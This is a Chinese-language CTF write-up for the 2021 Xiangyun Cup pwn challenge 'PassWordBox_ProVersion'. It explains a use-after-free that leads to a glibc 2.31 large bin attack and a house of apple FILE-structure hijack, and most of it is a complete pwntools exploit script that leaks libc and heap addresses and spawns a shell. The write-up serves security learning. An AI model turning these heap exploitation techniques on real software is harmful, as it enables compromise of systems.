2021 祥云杯 pwn-PassWordBox_ProVersion
这里就没有off by null了,size也只能是large bin的,那肯定就是large bin attack了,libc还是2.31的,所以笔者就直接用的ubuntu20.04自带的2.31做的
2.31的large bin已经和老的large bin攻击手法不一样了,2.31加了一些安全验证导致老的攻击手法失效, 但是还可以继续利用另一个点,这里有个师傅详写了2.31的large bin攻击手法
漏洞点发生在下图
这个函数将flags标志位设置为了1配合delete函数即可实现uaf功能。
现在是large bin attack,那如何getshell呢,当时没有house of apple,可以选用house of banana来解,现在笔者就直接用house of apple来解
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './pwdPro'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 0
if debug:
r = remote()
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Input Your Choice:'
def add(index, size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Which PwdBox You Want Add:', str(index))
r.sendlineafter('Input The ID You Want Save:', str(index))
r.sendlineafter('Length Of Your Pwd:', str(size))
r.sendlineafter('Your Pwd:', content)
def show(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Which PwdBox You Want Check:', str(index))
def edit(index, content):
r.sendlineafter(menu, '2')
r.sendline(str(index))
r.sendline(content)
def delete(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Idx you want 2 Delete:', str(index))
def recover(index):
r.sendlineafter(menu, '5')
r.sendlineafter('Idx you want 2 Recover:', str(index))
add(0, 0x440, '\x00')
r.recvuntil('Save ID:')
r.recv(8)
key = u64(r.recv(8))
li('key = ' + hex(key))
add(1, 0x420, '\x00')
add(2, 0x430, '\x00')
delete(0)
recover(0)
show(0)
r.recvuntil('Pwd is: ')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc_base = (u64(r.recv(8)) ^ key) - 96 - 0x10 - libc.sym['__malloc_hook']
li('libc_base = ' + hex(libc_base))
_IO_list_all = libc_base + libc.sym['_IO_list_all']
li('_IO_list_all = ' + hex(_IO_list_all))
_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
li('_IO_wfile_jumps = ' + hex(_IO_wfile_jumps))
add(3, 0x450, '\x00')
show(0)
r.recvuntil('Pwd is: ')
r.recv(8)
r.recv(8)
heap_base = (u64(r.recv(8)) ^ key) - 0x290
li('heap_base = ' + hex(heap_base))
delete(2)
leave_ret = 0x52db2 + libc_base
p1 = p64(0) + p64(leave_ret) + p64(heap_base + 0x290) + p64(_IO_list_all - 0x20)
edit(0, p1)
add(4, 0x450, '\x00')
recover(2)
target_addr = heap_base + 0x450 + 0x430 + 0x290
one = [0xe3afe, 0xe3b01, 0xe3b04]
one_gadget = one[1] + libc_base
p2 = b'\x00'
p2 = p2.ljust(0x18, b'\x00') + p64(1)
p2 = p2.ljust(0x90, b'\x00') + p64(target_addr + 0xe0)
p2 = p2.ljust(0xc8, b'\x00') + p64(_IO_wfile_jumps)
p2 = p2.ljust(0xd0 + 0xe0, b'\x00') + p64(target_addr + 0xe0 + 0xe8)
p2 = p2.ljust(0xd0 + 0xe8 + 0x68, b'\x00') + p64(one_gadget)
edit(2, p2)
r.sendlineafter(menu, '6')
r.interactive()
值得插一嘴的是这个key,笔者上一个free题是因为没注意\x00也会被计算,所以就造成了^ key的值不准确,这题笔者发现了这个问题后,就往后移了一个8字节,保证了key的准确性